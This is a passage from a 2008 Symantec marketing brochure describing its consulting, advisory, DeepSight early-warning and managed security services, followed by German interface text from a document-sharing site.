insight into key business information.
Symantec Residency Services
Symantec Residency Services offers highly trained experts who can augment your existing staff at
any level. Residents work onsite as members of your team for an extended period of time, helping
with strategy, projects, ongoing operations, and knowledge transfer. Symantec residents can
perform services under a statement of work, or they can operate under an arrangement where
Symantec takes on responsibility for key IT operations under a strict SLA.
Symantec Advisory Services
Symantec Advisory Services focuses on helping your organization understand and minimize
the security risks associated with your specific information environments. Advisory Services
consultants start by assessing your existing security posture, including policies, architecture,
infrastructure, and operations. Advisors then work to understand your tolerance for risk based on
business goals and strategies.
Armed with this information, our team then works with you to develop a plan to reduce and
manage security risktaking into account what vulnerabilities need to be addressed immediately,
what can wait until the next upgrade or patch cycle, and what can be considered an acceptable
risk. The end result is a holistic approach to reducing security risk that is based on your business
priorities.
23
Symantec gathers data
from more than two million
decoy email addresses, 120
million desktop antivirus
sensors, and 40,000
intrusion-detection and
firewall sensors worldwide.
Symantec DeepSight Early Warning Services
Symantec DeepSight Early Warning Services delivers notification of vulnerabilities and Internet
security attacks along with threat analyses and actionable information.
Early warning statistics provide insight into real-time incidents collected from more than 40,000
sensors in 180 countries. With these statistics, you can analyze and compare local event data with
global threat activity, threats in organizations similar to yours in size, and threats in companies in
your geographic proximity.
By comparing internal data to the global landscape, your organization can demonstrate security
benchmarking for regulatory compliance. Through integrated management and early warning, you
can accelerate the decision-making process for protecting critical assets.
Free 30-day trial service
You can experience the first line of defense for proactive enterprise security by taking advantage
of our 30-day free trial of Symantec DeepSight Early Warning Services. Contact your sales
representative for more information.
Symantec Managed Solutions
Symantec Managed Solutions combine onsite Symantec Consulting expertise with standardized
managed services delivered from remote locations. Symantec experts take over repetitive, labor-
intensive IT operations under strict SLAsso that you can optimize your resource investments
and focus on strategic initiatives with confidence.
To find out more
To find out more about the range of Symantec services available, visit our Web site at
www.symantec.com/business/services.
24
For specific country offices and
contact numbers, please visit
our Web site. For product
information in the U.S., call
toll-free 1 (800) 745 6054.
Symantec Corporation
World Headquarters
20330 Stevens Creek Boulevard
Cupertino, CA 95014 USA
+1 (408) 517 8000
1 (800) 721 3934
www.symantec.com
Copyright 2008 Symantec Corporation. All
rights reserved. Symantec, the Symantec Logo,
DeepSight, and Managed Security Services are
trademarks or registered trademarks of Symantec
Corporation or its affiliates in the U.S. and other
countries. Other names may be trademarks of their
respective owners.
04/08 13670834-1
About Symantec
Symantec is a global leader in
providing security, storage, and
systems management solutions to
help businesses and consumers
secure and manage their information.
Headquartered in Cupertino, Calif.,
Symantec has operations in more
than 40 countries. More information
is available at www.symantec.com.

B-Adv Guide Can Managing Ent Sec Be Made Easier 13670834-1.en-Us

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

B-Adv Guide Can Managing Ent Sec Be Made Easier 13670834-1.en-Us

Hochgeladen von

Copyright:

Verfügbare Formate

Symantec Global Services

Confidence in a connected world.

Das könnte Ihnen auch gefallen